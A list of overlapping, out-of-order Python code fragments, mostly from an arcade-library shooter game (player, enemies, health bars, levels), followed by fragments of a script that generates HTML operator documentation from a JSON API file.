"1 else: self.good = False def setup(self): # Set up the game #",
"center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the",
"the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level",
"isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") # Remove one health",
"self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from",
"the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all",
"releases a key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key",
"lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else:",
"Move player around the screen self.center_x += self.change_x self.center_y += self.change_y # Check",
"# Make sure this is the right sprite if not isinstance(enemy, ENEMY): raise",
"# Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement",
"self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health",
"# If it did, get rid of the bullet if len(hit_list) > 0:",
"bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in hit_list: #",
"arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270",
"# Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound",
"= None # Set up the player self.player_sprite = None self.enemy_health = 2",
"# Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def",
"330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123,",
"+ HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw",
"arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self,",
"if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead",
"3: for i in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\",",
"if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did,",
"self.bullet_list = None # Set up the player self.player_sprite = None self.enemy_health =",
"self.enemy_list) # If it did, get rid of the bullet if len(hit_list) >",
"= HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width),",
"False self.down_pressed = False self.width = SCREEN_WIDTH # Background image will be stored",
"or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\")",
"on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 *",
"if self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): #",
"in range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) #",
"elif self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies): #",
"# Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run()",
"it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0",
"on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y =",
"-= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists()",
"= arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed =",
"arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def",
"= True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers):",
"# Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x =",
"self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False elif key ==",
"view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\"",
"== 0: self.level = self.updated_level + 1 else: self.good = False else: for",
"self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to go to the",
"befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the",
"process for enemy in hit_list: # Make sure this is the right sprite",
"# arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, #",
"the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold",
"enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update",
"arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED)",
"to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level + 1",
"self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound",
"Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level =",
"in player_hit: # Make sure this is the right sprite if not isinstance(player,",
"enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level",
"self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed",
"self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y =",
"start_x bullet.center_y = start_y # Get from the mouse the destination location for",
"into account the angle, calculate our change_x # and change_y. Velocity is how",
"Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() #",
"= arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\"",
"5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level = -1",
"= -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy",
"= self.updated_level + 1 else: self.good = False else: for i in range(self.amount_of_enemies):",
"self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\")",
"range(self.amount_of_enemies): # Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position",
"arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y,",
"start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y",
"# Set up the game # Sprite lists self.window.level = 1 self.player_list =",
"scale, enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health",
"level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\",",
"to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View):",
"start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our",
"15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar()",
"start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your keyboard",
"* (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y -",
"start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse",
"- 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT +",
"= arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed =",
"+= .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit)",
"> 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the",
"arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif key",
"else: self.good = False def setup(self): # Set up the game # Sprite",
"HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw",
"< 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT,",
"to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\"",
"enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health",
"= self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get",
"enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y =",
"y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account",
"= True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound)",
"PLAYER): raise TypeError(\"List contents must be all ints\") # Remove one health point",
"key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True elif key",
"# Remove one health point player.player_cur_health -= 1 # Check health if player.player_cur_health",
"== arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user",
"SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y =",
"drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw()",
"the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game",
"self.bottom = 0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT -",
"= random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH)",
"through each bullet for bullet in self.bullet_list: # Check this bullet to see",
"width based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x -",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x =",
"if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for",
"will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None",
"# game = MyGame() # game.setup() # arcade.run() if __name__ == \"__main__\": main()",
"elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make",
"True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED",
"self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x)",
"-25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale)",
"super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health =",
"= True elif key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT:",
"hits escape, go back to the main menu view \"\"\" if key ==",
"HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,",
"elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed:",
"self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0",
"account the angle, calculate our change_x # and change_y. Velocity is how fast",
"fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) *",
"start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the",
"hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list = None #",
"have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x +",
"on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw",
"start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X,",
"this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render()",
"None self.enemy_list = None self.bullet_list = None # Set up the player self.player_sprite",
"if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60,",
"= -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and",
"-MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not",
"Make sure this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List",
"have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE)",
"escape, go back to the main menu view \"\"\" if key == arcade.key.ESCAPE:",
"(HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def",
"= random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"width based on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH",
"dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet flies",
"for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how",
"# render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background)",
"self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for",
"SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits",
"be all ints\") # Remove one health point player.player_cur_health -= 1 # Check",
"is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be",
"def levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3: for",
"self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) # Add extra",
"SCREEN_WIDTH # Background image will be stored in this variable self.background = None",
"Game Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound =",
"arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y",
"bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time): \"\"\" Movement and game logic",
"of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we",
", width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the",
"self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed",
"= random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5",
"0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy",
"class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\""
] |
[
"in a string meant to be interpreted as a JSON object, and removes",
"}}') + ( '<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + (",
"OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' )",
"if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders",
"file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except",
"%}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE %",
"a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in",
"( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first",
"( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim",
"os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed",
"import codecs from bs4 import BeautifulSoup from django.template import Template, Context import markdown",
"( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first",
"Exception, e: print 'Failed to build operator docs because: ', e def generate_operators_page_with_path(operators_api_path,",
"'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders =",
"through all the operators and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE)",
"markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment",
"%}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{% if",
") operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in",
"%}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{",
"faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control",
"', e def clean_json_string(body): \"\"\" Takes in a string meant to be interpreted",
"endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr",
"+= OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map = {}",
"type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">')",
"attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif",
"+ ( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul",
"%s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to build operator",
"simple\">{% for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1",
"+= operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' %",
"operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators",
"re import codecs from bs4 import BeautifulSoup from django.template import Template, Context import",
"1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>')",
"( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td",
"%}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}:",
"json import os import re import codecs from bs4 import BeautifulSoup from django.template",
"extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' +",
"'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang",
"codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build",
"operators_output += operator_template.render(Context(operator)) operators_output += OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html'",
"not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e:",
"attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{%",
"Exception, e: print 'Failed to build operator docs because: ', e def clean_json_string(body):",
"in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] =",
"input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {%",
"%}') + ( '</tbody>') + ( '</table></dd>') + ( '</dl>') + ( '</div>')",
"MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' + ( '<h2>{{ type }}</h2>')",
"+ ( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">') + (",
"+ ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in",
"\"\"\" try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index =",
"'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w',",
"os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except",
"% (destination_dir, lang) print 'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)):",
"to be interpreted as a JSON object, and removes faulty characters, recursively. \"\"\"",
"( '<td class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {%",
"%}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd",
"field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input",
"from bs4 import BeautifulSoup from django.template import Template, Context import markdown from deploy.utils",
"markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">'",
"( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') + ( '</dl>')",
"exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed to",
"bs4 import BeautifulSoup from django.template import Template, Context import markdown from deploy.utils import",
"', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file. with",
"'</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{%",
"def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise",
"for input in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>)",
"for operator in operators: if 'comment' in operator: formula_map = {} comment =",
"from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div class=\"section\" id=\"{{ type }}\">' +",
"%}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + ( '<td",
"'<table class=\"docutils field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') +",
"class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') + ( '<th",
"}}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + ( '<table class=\"docutils field-list\">') +",
"build operator docs because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the",
"output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{%",
"Takes in a string meant to be interpreted as a JSON object, and",
"endfor %}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') + (",
"+ ( '</tr>') + ( '{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th",
"print 'Failed to build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs):",
"'cn/html']) except Exception, e: print 'Failed to build operator docs because: ', e",
"lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to",
"new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators:",
"== 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif",
"with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to",
"%s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file:",
"inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{%",
"(<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif",
"= {} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line)",
"# Go through all the operators and construct a new HTML object. operator_template",
"type }}\">' + ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}')",
"class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def",
